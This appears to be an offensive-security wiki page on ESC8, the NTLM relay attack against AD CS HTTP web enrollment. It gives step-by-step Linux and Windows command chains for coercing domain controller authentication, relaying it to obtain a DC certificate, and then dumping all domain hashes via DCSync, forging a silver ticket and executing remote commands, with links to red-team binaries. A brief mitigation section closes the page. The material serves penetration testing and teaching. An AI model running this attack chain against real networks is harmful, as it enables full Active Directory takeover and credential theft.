ESC8
Description
ESC8 attacks fall under the category of NTLM relay attacks. Active Directory Certificate Services (AD CS) supports multiple enrollment methods, including HTTP-based enrollment, which enables users to request and obtain certificates over HTTP. The core concept of ESC8 abuse involves coercing authentication from a machine account and relaying it to AD CS to acquire a certificate that permits client authentication.
Since the HTTP protocol does not enforce NTLM signature verification during authentication, if the HTTP enrollment endpoint is enabled, an attacker can obtain NTLM authentication (through techniques like authentication coercion or poisoning), relay it to the AD CS HTTP endpoint, and request a certificate for the authenticated account.
Requirements for attack path
vulnerable web enrollment endpoint
at least one certificate template that is enabled and allows for domain computer enrollement and client authentication
Linux
Enumeration
certipy find -u 'Moe@Security.local' -p 'Password123' -dc-ip 10.10.10.100 -stdout -vulnerable

Performing the attack
After identifying a vulnerable web enrollment endpoint we can next setup the NTLM relay. We can use either ntlmrelayx or certipy.
# Certipy, target is the ADCS server
certipy relay -target 10.10.10.2 -template DomainController
# ntlmrelayx, target is the ADCS server
impacket-ntlmrelayx -t http://10.10.10.2/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Once either of the relay listeners is running we can use Coercer to perform forced authentication.
coercer coerce -l 10.10.10.4 -t 10.10.10.2 -d security.local -u moe -p Password123 --always-continue
Once coercion is successful, certipy or ntlmrelayx will both save the certificate file to the current directory.
[*] Targeting http://10.10.10.2/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Requesting certificate for 'SECURITY\\DC01$' based on the template 'DomainController'
[*] Got certificate with DNS Host Name 'DC01.SECURITY.LOCAL'
[*] Certificate object SID is 'S-1-5-21-13999771-2333344039-1820745628-1000'
[*] Saved certificate and private key to 'dc01.pfx'
Then use certipy to obtain credentials
certipy auth -pfx DC01$.pfx -dc-ip 10.10.10.100
Post Exploitation
Various post-exploitation steps can be undertaken after obtaining a machine account hash. The below example will focus on post-exploitation with a Domain Controller hash.
DCSync
A simple approach would be to perform a DCsync with impacket-secretsdump using the domain controller hash obtained from the certificate.
# All data
impacket-secretsdump 'DC01$'@10.10.10.100 -hashes :1fe859c38adaa592ad52559fd9ab584d
# Single user
impacket-secretsdump 'DC01$'@10.10.10.100 -hashes :1fe859c38adaa592ad52559fd9ab584d -just-dc-user krbtgt
Silver Ticket
As an alternative option we can generate a silver ticket for a particular service such as CIFS and then gain direct command execution over the target, in this case the Domain Controller.
Firstly, identify the domain SID.
impacket-lookupsid 'DC01$'@10.10.10.100 -hashes :1fe859c38adaa592ad52559fd9ab584d | grep 'Domain SID is:'
Next, we use ticketer to forge a silver ticket for a given service. In this case CIFS over Domain Controller.
impacket-ticketer -nthash 1fe859c38adaa592ad52559fd9ab584d -domain-sid S-1-5-21-13999771-2333344039-1820745628 -domain security.local -spn cifs/dc01.security.local Administrator
Then export the TGS.
export KRB5CCNAME=Administrator.ccache
Finally, authenticate and issue commands.
nxc smb dc01.security.local --use-kcache -x 'whoami'

Windows
Local administrator rights are required on Windows to perform this attack as SMB traffic needs to be redirected to a non-default port.
Enumeration
Certify does not identify web enrollment endpoints as such, some manual identification should be enough. Browse to the Web Enrollement for the Certificate Authority.
http://ca.security.local/certsrv/certfnsh.asp
If we connect over HTTP and see an authentication form such as that shown below, the endpoint is likely vulnereable to ESC8.

Performing the attack
NTLMrelayx.exe
https://github.com/The-Viper-One/RedTeam-Binaries/blob/main/ntlmrelayx.exe
DivertTCPconn
https://github.com/Arno0x/DivertTCPconn/tree/master/compiled_binaries/Binaries_x64
SharpEFSTrigger
https://github.com/The-Viper-One/RedTeam-Pentest-Tools/blob/main/Coercion/SharpEfsTrigger.exe
Usage
Configure DivertTCPconn to redirect SMB traffic to port 8445 (Requires Local Admin)
.\divertTCPConn.exe 445 8445
Set up NTLMRelayx and target the Certificate Authority web enrollment point. Ensuring to specify --smb-port 8445.
.\ntlmrelayx.exe --smb-port 8445 -t http://ca.security.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Coerce a Domain Controller to authenticate to the testing host in order to capture the certificate for the Domain Controller
.\SharpEfsTrigger.exe [Target] [Listening-Host] [API Call]
.\SharpEfsTrigger.exe 10.10.10.100 10.10.10.3 EfsRpcEncryptFileSrv
This should capture the certificate of the Domain Controller providing the coercion is successful.

Post Exploitation
DCSync
A simple approach would be to perform a DCsync with PsMapExec using the domain controller TGT obtained from the certificate.
PsMapExec -targets 'dc01' -domain 'security.local' -method 'dcsync' -showoutput -ticket 'doIGRjCCBkKgAwIBBaEDAgEWooI....'

Mitigation
Enable EPA for Certificate Authority Web Enrollment
Disable NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic. To configure this GPO, open Group Policy and go to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options and set Network security: Restrict NTLM: Incoming NTLM traffic to Deny All Accounts or Deny All domain accounts. If needed, you can add exceptions as necessary using the setting Network security: Restrict NTLM: Add server exceptions in this domain.
Disable NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" services.
Last updated